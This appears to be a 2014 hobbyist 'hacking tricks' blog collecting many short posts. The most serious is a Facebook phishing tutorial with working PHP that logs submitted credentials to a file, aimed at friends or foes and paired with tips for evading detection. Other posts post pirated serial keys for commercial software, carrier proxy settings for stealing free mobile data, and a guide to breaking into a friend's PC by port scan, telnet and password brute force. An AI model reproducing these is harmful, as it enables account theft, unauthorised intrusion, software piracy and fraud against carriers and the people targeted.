Monday, 6 October 2014

Lock your personal folders with PASSWORD

How to LOCK a FOLDER?

In this post i will show you interesting and usefull trick to password protect folder without using any software using batch file programming. 

This trick will work on all windows platform (Win XP, Win 7). Follow below tutorial to learn this trick.
1. Open Notepad and Copy code given below into it.
cls
@ECHO OFF
title fbaswinhacker.blogspot.in
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST HME-Folder goto MDHME-Folder
:CONFIRM
echo Are you sure to lock this folder? (Yes/No)
set/p "cho=>"
if %cho%==Yes goto LOCK
if %cho%==yes goto LOCK
if %cho%==no goto END
if %cho%==No goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren HME-Folder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== hme goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" HME-Folder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDHME-Folder
md HME-Folder
echo HME-Folder created successfully
goto End
:End
   2. Save the notepad file as lock.bat (.bat is must)
   3. Now double click on lock.bat and a new folder will be created with name MyFolder
   4. Copy all your data you want to protect in that New folder
   5. Now double click on lock.bat and when command promp appears Type "yes" and press enter.
   6. Now HME-Folder will be hidden from you view, to access that folde double click on lock.bat
   7. It will ask for password enter your password and done. (Default password is hme)
To change the password replace hme with  new password in the above code.
If u like this post like our fb page fr more....

Saturday, 4 October 2014

Facebook hacking by phising 10000% working

Facebook Phising(Hacking)

im back aftr a long brk.
Im now starting with the tutorial for facebook hacking in a simple n easy wayz.
So lets get started .....
Today many of people try to hack facebook accounts to kiddy their frndz r foe. So this post will help in a good way to hack ur frndz r foe's fb accounts...
Steps to be followed:
  1. Go to facebook login page and right-click on the page.
  2. Select the view page source option in right click context menu.
  3. The coding of the facebook login page will appear in a new tab.
  4. Copy that nd paste it in the notepad.
  5. In the notepad , press ctrl+f and type action.
  6. Replace the line action="https://www.facebook.com/login.php?login_attempt=1" to post.php.
  7. Now save this coding as index.htm not .html.
  8. Open another new notepad tab nd paste the following.
<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
  1. Save this coding as post.php.
  2. Now goto 000webhost.com and register your account.
  3. Goto filemanger and goto public_html in the filemanger of your website.
  4. Delete the defualt.php file in the public_html folder.
  5. Now upload the index.htm and post.php one by one in the public_html folder.
  6. Now send your website name registered in the 000webhost to ur frnd who u want to hack.
NOTE: Dont send ur website in fb chat msg or dont share in ur timeline.Otherwise fb identifies that it is a phising page.

Monday, 15 September 2014

Join n njoy free talktime

I'm using hike, an awesome new free messaging app! Download the app at http://get.hike.in/ to start messaging me for free!

Saturday, 6 September 2014

AirTel fRee InterNet tRick 10000% working.

Airtel proxy tricks are the oldest members of
free internet/ gprs tricks world. Its easy to
setup and works for almost everyone who try
it. Here we are sharing a high speed proxy
server for Airtel which is working for both
browsing and downloading. Many of us search
for airtel blocked sim proxy but now days
rarely any host works for blocked sim. So lets
come to this post where we are sharing a
latest free proxy trick 2014 which is working
on any device. Here we are enclosing few of
the features of this proxy trick.
Eye Catching Features-
1.Its a default browser trick.
2.Works on both 2g and 3g network.
3.Works for Android, Java, Symbian, Pc, etc.
How To Use Proxy Trick ?
Proxy tricks are nothing but a simplest form
of network tricking method which can be
used to access free internet. It works on
default browser of the device and doesn't
require any technical knowledge, means a
newbie [new to tricks] can also setup this.
Lets see how to use it on mobile and
computer.
For Mobile:
1.Go to settings option.
2.Then open Network Connection Setting.
3.Now in the option, click on create new
setting/ connection.
4.There you'll get many input options just do
as stated below-
5.Account Name - Free Internet
6.APN (Access Point) - airtelgprs.com
Proxy - 4everproxy.com OR 192.30.136.222
avoidr.com OR 5.63.151.30
proxies.us OR 23.105.134.34
hideip.co OR 199.167.133.154
hiload.org OR 37.48.85.195
clickbypass.info OR 198.50.152.63
www.zfreez.com OR www.efreetimes.com OR
www.vigoob.com OR 46.105.18.32
5.10.71.134 OR Jetproxy.com
5.199.140.148 OR proxy.hmastuff.com
7.Port - 80
8.Leave all other field as it is means don't
touch any other field.
9.Now save your setting and make it default.
10.Now open default browser and enter your
network's freely opening host [website] like
in airtel open www.airtellive.com OR
get.hike.in OR buddies.airtelmoney.in OR
airtelgurus.com OR ic.bsbportal.com or
video.bsbportal.com OR live.airtelworld.com
That's it. Now enjoy free internet in your
mobile. :)
For Computer (PC) / Laptop -
I will recommend you to use Mozilla Firefox
for setting up proxy trick.
1. Open Options.
2. Click on advance tab and then network tab.
3. Click on Manual Connection setting and add
the above given proxy and port.
3. Save the setting.
Note- If you get low loading speed then
disable javascript. You will definately feel the
difference.

Saturday, 19 July 2014

Airtel free SMS trick.

STEPS -
1. Go to Write msg Option.
2. Then Write "NY" Space Friend Number Space
Your
Msg.
3. Send It to 55444
4. Keep Balance Rs.0
Example:- NY 809253**** How are you
& Send
it 55444.

Serial keys for some popular softwares

Serial Keys For Popular Software
╚═►VMware Workstation v9.X ◄═╝
Serial Key:→↓
ZF3X0-4ZW0Q-0842P-E6PGC-PKRZF
VY19K-01X5L-084MY-MXMZG-MAUF2
YA5X2-FEFDK-H80VQ-4YWQC-MPARD
YU1WA-F1GD7-485UQ-ADNNT-XCAR6
GF1WR-FGZ5J-485RY-JGQQC-XZ2G8
AY3HA-F1D5N-08D7Q-Z6X5T-XK2G2
YG5EK-D1X8L-088XY-NNQEC-P3AW6
VF14H-0YFE5-48D2Z-ZDPNT-YFUZ8
ZU31H-2WY83-0853Y-Z5WQZ-ZAAC6
GC1WK-F8XEM-M812P-9WMG9-
XUU9F
AY540-00W0M-088DY-GDQ7T-QL8Z8
FF34U-A5W11-H80UP-F6WNV-NL8V6
CF71K-AGD52-H894Q-Q4P7E-XL2R6
YZ5MA-6GXDP-0841Y-K4PNG-XK2ZF
==============================
==============================
============
╚═►NovaPDF Professional Desktop
v7.7.387◄═╝
Name : Dennis Anker
Serial: B11F-8V0T-XRU2-
Z344-4MDF-2WM5-6XEB-NHK4
==============================
==============================
============
╚═►Microsoft Office 2013◄═╝
S/N: 9MBNG-4VQ2Q-WQ2VF-X9MV2-
MPXKV
==============================
==============================
============
╚═►PowerDVD v5.0◄═╝
S/N: MV588995988G2285
==============================
==============================
============
╚═►Active Partition Recovery Enterprise
v8.0◄═╝
Registered Name: Bernhard Walder
Registration Key: 00001Q-RB25T2-2
4ZXFW-WVDC84-RCD4EQ-YWMDZ6-
MD61TD-VQ4VMU-87UD
C3-5JB9DX-8NJMPA
==============================
==============================
============
╚═►AUTO CAD 2013◄═╝
sl no= 110-10061620, product key=
781E1
==============================
==============================
============
╚═►Internet Download Manager v6.15.1
Serial◄═╝
First Name: Anything
Last Name: Anything
Email: Anything
Serial: 7G7QY-NZWKQ-23KRA-RAMQ4
==============================
==============================
============
╚═►Registry Workshop v4.6.2◄═╝
Serial Key:→↓
01CBC4B66A06969B2638235982DED4
75E724C63B3D32A13286D226D99703
423AA060156394800258D5EF54FCCF
B52306C7A2AA1D44A028E17E2833D3
CC70F31E
==============================
==============================
============
╚═►USB Disk Security v6.2.0.30 Serial
Key◄═╝
ACADEMIC
18027
------------------------------
ABUTTER
18011
------------------------------
ABRAZITE
17950
------------------------------
ABRADE
17875
------------------------------
WIRING
17820
==============================
==============================
============
╚═►Advanced Archive Password
Recovery Pro v4.53◄═╝
↓→:Serial Key:→↓
ARCHPRP-NWGTN-45653-DXZWD-9332
6
ARCHPRP-LEHKE-58253-RHCZW-7326
9n
==============================
==============================
============
╚═►Internet Download Manager
v6.14.3◄═╝
First Name: Any Name
Last Name: Any Name
Email: Any Email
Serials:
7G7QY-NZWKQ-23KRA-RAMQ4
or
D4B22-SWRY9-FLFVP-NETDI
==============================
==============================
============
╚═►ImTOO Video Converter Ultimate
v7.7.0.20121224◄═╝
←↓→:Serial Key:→↓←
3A17-E5E5-C390-A079-39A9-E3EA-
80A4-6C62
CB28-7E7E-5CA1-B182-F8A7-0041-
D754-4B55
A5C6-1818-3A4F-5F69-E202-75D0-
89ED-FC87
C3A1-7E8E-5C39-3A00-7C33-822B-
389B-44D3
1BC5-E0E7-92BC-BC56-1161-A53D-
F9E7-918D
A18F-5C6C-3A17-18EB-34FC-2042-
46A4-5695
816C-5A5A-38E7-17C3-9E64-05A5-
257B-02BF

Tata Docomo Internet Free 100% working

TATA DOCOMO FREE NET FOR ANDROID
*.In Android you must install a Opera Mini
Browser.
*.Now open your Settings
*.Now fill this area like this:
Name : Tata Docomo
APN :TATA.DOCOMO.INTERNET
PROXY :010.124.094.007
PORT :80
now save the settings and open your Browser
and enjoy free net.

Airtel free internet 100% working

Name: H M E tricksters
Home Page:
d26le6habm8lnc.cloudfront.net
Proxy: Hiload.org
Port: 80
Apn: Airtelgprs.com
Thats It Now Save The Setting... And
Open Ur Default Browser N Open Home
Page Which Is Mentioned Above

!dea free callertune trick

HELLO FRIENDS .. TODAY I AM GOING TO
POST IDEA FREE CALLER TUNE FOR LIFE
TIME ...
THIS OFFER IS OFFICIAL . SO DON'T BEWARE
OF BALANCE DEDUCTION ...
THE DEFAULT CALLER TUNE IS HUNNY
BUNNY WILL BE ACTIVATED
STEPS :
1. Type HB And Send it to 56789
2. THE MSG WILL ARRIVE FROM 5430006376
JUST YOU HAVE TO REPLY 1
THE CALLER TUNE WILL BE ACTIVATED FOR
30 DAY WITHOUT ANY CHARGE ( 0RS) ...
ACTIVATE AGAIN AFTER 30 DAYS ...
ENJOY FREE CALLER TUNE
Regard''s...!

Free airtel 3g internet

100000% Working For Blocked Users Airtel 3G

Name : H M E trick
Proxy : 150.161.2.9
Port: 80
Apn: airtelgprs.com

Thats it now go to browser and enter

http://airtelgurus.com/~mgr/proxy/index.php

!dea free dialer tone for lifetime.

HELLO FRIENDS .. TODAY I AM GOING TO POST IDEA FREE CALLER TUNE FOR LIFE TIME ... THIS OFFER IS OFFICIAL . SO DON'T BEWARE OF BALANCE DEDUCTION ... THE DEFAULT CALLER TUNE IS HUNNY BUNNY WILL BE ACTIVATED STEPS : 1. Type HB And Send it to 56789 2. THE MSG WILL ARRIVE FROM 5430006376 JUST YOU HAVE TO REPLY 1 THE CALLER TUNE WILL BE ACTIVATED FOR 30 DAY WITHOUT ANY CHARGE ( 0RS) ... ACTIVATE AGAIN AFTER 30 DAYS ... ENJOY FREE CALLER TUNE Regard''s...!

Sunday, 25 May 2014

Make a realistic fake virus to prank ur frnds.

To use green (DOS) colored
text, first type "color A"
without quotes.
Hold ALT then press enter
In command prompt type :
cd c :\ (press enter)
dir /s (press enter)
There you are ! You have now
successfully pranked somebody
in the most delightful way!
To exit it press CTRL+C then
type exit and press enter

Friday, 23 May 2014

Make windows xp installation within 10 min.

Guys my new win xp installation trick.. When installing windows tab starts press ctrl+f10 command will open type task manager. When task manager opens select services tab in that u will see setup.exe right click on it n change priority to highest. Then windows will install within 10 min. And not wasting 1 hr to install in generally..... If u liked this trick put a like 2 it guys....

Tuesday, 22 April 2014

How to make symbols with keyboard

How to make symbols with keyboard

Try this shortcut keys in the comment or for sending msg anywhere.
Alt + 0153 ..... ™...  trademark symbol
Alt + 0169 .... ©....  copyright symbol
Alt + 0174 ..... ®.... registered trademark symbol
Alt + 0176 ...°...... degree symbol
Alt + 0177 ...±.... plus-or-minus sign
Alt + 0182 ...¶..... paragraph mark
Alt + 0190 ...¾.... fraction, three- fourths
Alt + 0215 ....×..... multiplication sign
Alt + 0162 ...¢....  cent sign
Alt + 0161 .....¡..... .upside down exclamation
Alt + 0191 .....¿..... upside down question mark
Alt + 1...... ☺.....smiley face
Alt + 2 ......☻..... black smiley face
Alt + 15.....☼..... sun
Alt + 12......♀..... female sign
Alt + 11.....♂...... male sign
Alt + 6.......♠..... spade
Alt + 5.......♣......  Club
Alt + 3........♥.....  Heart
Alt + 4.......♦......  Diamond
Alt + 13......♪..... eighth note
Alt + 14......♫...... beamed eighth note
Alt + 8721.... ∑....  N-ary summation (auto sum)
Alt + 251.....√..... square root check mark
Alt + 8236.....∞.....  infinity
Alt + 24.......↑.....  up arrow
Alt + 25......↓......  down arrow
Alt + 26.....→..... right arrow
Alt + 27......←..... left arrow
Alt + 18.....↕...... up/down arrow
Alt + 29......↔...  left right arrow

Friday, 11 April 2014

Download torrent via internet explorer or mozilla

1. First download your .torrent file.
2. Then go to zbigz.com and click upload torrent.
3. After uploading your torrent you will get your content in .zip file.
4. Download the .zip file and extract it.
5. That it simple!

Thursday, 10 April 2014

Make Your Computer Welcome You

Make your Computer Welcome You

We generally see in movies that the PC of the Actor/Actress welcomes him by calling his/her name.
We also want that our PC should also welcomes us like them.

With this trick, you can make your Computer welcome you in its computerized voice. You can make your Windows based computer say "Welcome to your PC, Username."


Make Windows Greet you with a Custom Voice Message at Startup
To use this trick, follow the instructions given below:-
1.      Click on Start. Navigate to All Programs, Accessories and Notepad.
2.      Copy and paste the exact code given below
Dim speaks, speech
speaks="Welcome to your PC, Username"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks
3.    Replace Username with your own name.
4.  Click on File Menu, Save As, select All Types in Save as Type option, and save the file     as Welcome.vbs or "*.vbs".
 5.  Copy the saved file.
 6.  Navigate to C:\Documents and Settings\All Users\Start Menu\Programs\Startup (in  Windows XP) and to C:\Users\ {User-Name}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (in Windows 8, Windows 7 and Windows Vista) if C: is your System drive. AppData is a hidden folder. So, you will need to select showing hidden folders in Folder options to locate it.
7.  Paste the file.
8. That’s it.
Note: For best results, it is recommended to change sound scheme to No Sounds.

Wednesday, 2 April 2014

Top methods for hacking fb accounts

Now a days every one is searching on net how to hack a Facebook account..Everyoneis trying to get the methods of hacking Facebook....I have got some e mails regarding this topic . So I have decided to give a series of post on this topic....Today's post is an introductory post on this topic . I’m now discovering all the methods used to hack Facebook password and some counter measures can also help you protect your Facebook account from hacking.1. PhishingPhishing is still the most popular attack vector used for hacking Facebook accounts.There are variety methods to carry out phishing attack. In a simple phishing attacks a hacker creates a fake log in page which exactly looks like the real Facebook page and then asks the victim to log in. Once the victim log in through the fake page the, the victims "Email Address" and"Password" is stored in to a text file, and thehacker then downloads the text file and gets his hands on the victims credentials.2. Key loggingKey logging is the easiest way to hack a Facebook password. Key logging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A Key logger is basically a small program which, once is installed on victim's computer, will record every thing victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address.3. Stealer'sAlmost 80% percent people use stored passwords in their browser to access the Facebook. This is quite convenient, but can sometimes be extremely dangerous. Stealer's are software's specially designed to capture the saved passwords stored in the victims Internet browser.4. Session HijackingSession Hijacking can be often very dangerous if you are accessing Facebook on a http (non secure) connection. In Session Hijacking attack, a hacker steals the victims browser cookie which is used toauthenticate the user on a website, and use it to access the victims account. Sessionhijacking is widely used on LAN, and WiFi connections.5. Side jacking With Fire sheepSide jacking attack went common in late 2010, however it's still popular now a days.Fire sheep is widely used to carry out side jacking attacks. Fire sheep only works when the attacker and victim is on the same WiFi network. A side jacking attack is basically another name for http session hijacking, but it's more targeted towards WiFi users.6. Mobile Phone HackingMillions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probablygain access to his/her Facebook account. Their are a lots of Mobile Spying softwares used to monitor a Cellphone. The most popular Mobile Phone Spying software's are: Mobile Spy, and Spy Phone Gold.7. DNS SpoofingIf both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original Facebook page to his own fake page and hence can get access to victims Facebook account.8. USB HackingIf an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the Internet browser.9. Man In the Middle AttacksIf the victim and attacker are on the same LAN and on a switch based network, a hacker can place himself between the client and the server, or he could act as a default gateway and hence capturing all the traffic in between.10. Bot netsBot nets are not commonly used for hacking Facebook accounts, because of it's high setup costs. They are used to carry more advanced attacks. A Bot net is basically a collection of compromised computer. The infection process is same asthe key logging, however a Bot net gives you additional options for carrying out attacks with the compromised computer. Some of the most popular Bot nets include Spy eye and Zeus.

Sunday, 30 March 2014

History of hacking

Hacking has been around for more than a century. In the 1870s, several teenagers were flung off the country's brand new phone system by enraged authorities. Here's a peek at how busy hackers have been in the past 35 years.
Early 1960s
University facilities with huge mainframe computers, like MIT's artificial intelligence lab, become staging grounds for hackers. At first, "hacker" was a positive term for a person with a mastery of computers who could push programs beyond what they were designed to do.
Early 1970s
John Draper
John Draper
John Draper
makes a long-distance call for free by blowing a precise tone into a telephone that tells the phone system to open a line. Draper discovered the whistle as a give-away in a box of children's cereal. Draper, who later earns the handle "Captain Crunch," is arrested repeatedly for phone tampering throughout the 1970s.
Yippie social movement starts YIPL/TAP (Youth International Party Line/Technical Assistance Program) magazine to help phone hackers (called "phreaks") make free long-distance calls.
Two members of California's Homebrew Computer Club begin making "blue boxes," devices used to hack into the phone system. The members, who adopt handles "Berkeley Blue" (Steve Jobs) and "Oak Toebark" (Steve Wozniak), later go on to found Apple Computer.
Early 1980s
Author William Gibson coins the term "cyberspace" in a science fiction novel called Neuromancer.
In one of the first arrests of hackers, the FBI busts the Milwaukee-based 414s (named after the local area code) after members are accused of 60 computer break-ins ranging from Memorial Sloan-Kettering Cancer Center to Los Alamos National Laboratory.
Comprehensive Crime Control Act gives Secret Service jurisdiction over credit card and computer fraud.
Two hacker groups form, the Legion of Doom in the United States and the Chaos Computer Club in Germany.
2600: The Hacker Quarterly is founded to share tips on phone and computer hacking.
Late 1980s
The Computer Fraud and Abuse Act gives more clout to federal authorities.
Computer Emergency Response Team is formed by U.S. defense agencies. Based at Carnegie Mellon University in Pittsburgh, its mission is to investigate the growing volume of attacks on computer networks.
At 25, veteran hacker Kevin Mitnick secretly monitors the e-mail of MCI and Digital Equipment security officials. He is convicted of damaging computers and stealing software and is sentenced to one year in prison.
First National Bank of Chicago is the victim of a $70-million computer heist.
An Indiana hacker known as "Fry Guy" -- so named for hacking McDonald's -- is raided by law enforcement. A similar sweep occurs in Atlanta for Legion of Doom hackers known by the handles "Prophet," "Leftist" and "Urvile."
Early 1990s
After AT&T long-distance service crashes on Martin Luther King Jr. Day, law enforcement starts a national crackdown on hackers. The feds nab St. Louis' "Knight Lightning" and in New York grab Masters of Deception trio "Phiber Optik," " Acid Phreak" and "Scorpion." Fellow hacker "Eric Bloodaxe" is picked up in Austin, Texas.
Operation Sundevil, a special team of Secret Service agents and members of Arizona's organized crime unit, conducts raids in 12 major cities, including Miami.
A 17-month search ends in the capture of hacker Kevin Lee Poulsen ("Dark Dante"), who is indicted for stealing military documents.
Hackers break into Griffith Air Force Base, then pewwwte computers at NASA and the Korean Atomic Research Institute. Scotland Yard nabs "Data Stream," a 16-year-old British teenager who curls up in the fetal position when seized.
A Texas A&M professor receives death threats after a hacker logs on to his computer from off-campus and sends 20,000 racist e-mail messages using his Internet address.
Kevin Mitnick
Kevin Mitnick [photo / AP ]
In a highly publicized case, Kevin Mitnick is arrested (again), this time in Raleigh, N.C., after he is tracked down via computer by Tsutomu Shimomura at the San Diego Supercomputer Center.
Late 1990s
Hackers break into and deface federal Web sites, including the U.S. Department of Justice, U.S. Air Force, CIA, NASA and others.
Report by the General Accounting Office finds Defense Department computers sustained 250,000 attacks by hackers in 1995 alone.
A Canadian hacker group called the Brotherhood, angry at hackers being falsely accused of electronically stalking a Canadian family, break into the Canadian Broadcasting Corp. Web site and leave message: "The media are liars." Family's own 15-year-old son eventually is identified as stalking culprit.
Hackers pierce security in Microsoft's NT operating system to illustrate its weaknesses.
Popular Internet search engine Yahoo! is hit by hackers claiming a "logic bomb" will go off in the PCs of Yahoo!'s users on Christmas Day 1997 unless Kevin Mitnick is released from prison. "There is no virus," Yahoo! spokeswoman Diane Hunt said.
1998
Anti-hacker ad runs during Super Bowl XXXII. The Network Associates ad, costing $1.3-million for 30 seconds, shows two Russian missile silo crewmen worrying that a computer order to launch missiles may have come from a hacker. They decide to blow up the world anyway.
In January, the federal Bureau of Labor Statistics is inundated for days with hundreds of thousands of fake information requests, a hacker attack called "spamming."
Hackers break into United Nation's Children Fund Web site, threatening a "holocaust" if Kevin Mitnick is not freed.
Hackers claim to have broken into a Pentagon network and stolen software for a military satellite system. They threaten to sell the software to terrorists.
The U.S. Justice Department unveils National Infrastructure Protection Center, which is given a mission to protect the nation's telecommunications, technology and transportation systems from hackers.
Hacker group L0pht, in testimony before Congress, warns it could shut down nationwide access to the Internet in less than 30 minutes. The group urges stronger security measures.

How to Make Windows XP Startup Faster

How to Make Windows XP Startup Faster
Do you often get frustrated while you wait around for your slow Windows XP computer to startup? Windows XP will automatically load and startup all the programs that are in the startup folder whether you intend to use them or not. This article will show you how you can speed up the bootup process of your XP PC by removing the programs that usually bog it down.


1.      Click on Start, then Run, and type "msconfig". Wait for a new window to pop up.


2.      Look under the "BOOT.INI" tab. You will see a box labeled "Timeout:", and a numerical value. By default, it's 30, which means 30 seconds of wait time before boot. This can be changed, make it 4 seconds. (Note: if you have more than one operating system, this means the wait time to startup to the highlighted Operating System is longer. Sometimes you might want a bit more than 4 seconds, then you can opt 5 or 10 seconds)


3.      Delete The Temporary Files Periodically From Your Computer To Make The Applications Run Faster. Type %temp% in the run dialog box by clicking on Start -> Run, and click on "OK". You will see an open folder with many files. Click on the Edit menu and click on Select all and then click on the File menu and select Delete. Note: Always confirm that the folder which is opened has the word "temp" on the top of the menu bar and the folder indicates that it is a temporary folder.


4.      Perform a Scandisk To See That Your Computer Hard Drive is in Healthy Condition and it helps Your Computer Run Faster.


5.      After doing all this, another method you can do is to allow the computer to hibernate. Hibernation closes and opens Windows faster than usual. However, Hibernation is a good long-term recommended solution, as it does save electricity.


6.      Go to Start->Control Panel->Power Options. Click on the Hibernate tab.


7.      Click on the box that says "Enable hibernation" to check it.


8.      Click on the Advanced tab and change the Power buttons options if you want to hibernate by pressing the sleep button or the power button. Otherwise, holding the Shift key while in the Turn Off Computer menu will give you the option to hibernate.


9.      Restart your computer every week or so to clean your computer.
10.  The power can then be completely turned off, even at the socket so that no power is wasted.
 

Saturday, 29 March 2014

Hack your friends PC using IP address

Hack your friends PC using IP address
Literally, hacking is to get something or someone on the internet without their consent or interest. While speaking of a short, hacking is a very easy job, it is as if instead of the using front door, finding a hidden door of a house and the seizure of valuables(hijacking the precious things). Among the main hacking, hacking through the IP address is one of the most common yet with a powerful beggining.

You may want to hack the website and put your advertisement there or grab some
database information.
In this type of hacking, you are playing with the web server’s computer instead of the administrator’s computer.
Because for eg. www.website.com is in a separate Web server instead of the personal computer.

Another might be to access the computer of your friend from your home. Again, based on IP, and it is only possible when your friend’s computer is online. If it is off or not connected to the Internet, allowing external IP hacking(remote IP Hacking) is quite impossible.

 
Well, both have the same process. So Let's summarize what we should do.

First Of All Confirm the site or the computer you wanna hack.

1. Discover or trace their IP addresses.

2. Verify that the IP address is online

3. Scan open ports

4. Check the doors Venerability(for venerable ports)

5. Access through the door(probably the port).

6. Brute force username and
password

Now let me just briefly describe the basic
steps that a child can also understand if you didnt get.

First, get the IP address of the victim.

To get the IP address of the victim's website, ping for it in command prompt.

For example,

ping www.google.com
=>
To retrieve the IP address of google.com. You can find an image of cmd below 

 
That's how we can get the IP address of the victim's website.

What about your friend's PC? You can't do www.yourfriendname.com, huh?
Finding the IP address of your friend's PC is a bit complicated and most difficult, if it has a dynamic IP address, which changes constantly.

A common method to detect the IP address of your friend is talking to him.

Go Here From your Friend's Computer:
http://www.tracemyip.org/
From Here You Can Check Out His IP-Address & Note It Down somewhere.

Now, did you have the IP address?
If yes then do check it out if he/she's online? ITo know the online status just ping the IP address, if it is online it will reply.

If the IP address is online, scan for the open ports. Open ports are like closed doors, without locks, you can get in and out easily.

Use the
Advanced Port Scanner to scan all open and venerable ports/doors.
Now that you have the IP address and open port of the victim, now you can use telnet to try to access it
  Make sure you have telnet enabled on your computer or install it from:Control Panel > Add or Remove Programs > Add Windows Components


Then open command prompt and use the telnet command to access the IP address.
Use the following syntax for the connection.
 You will be prompted for login information.
 In this way, you will be able to hack remote computer using just the IP address. !!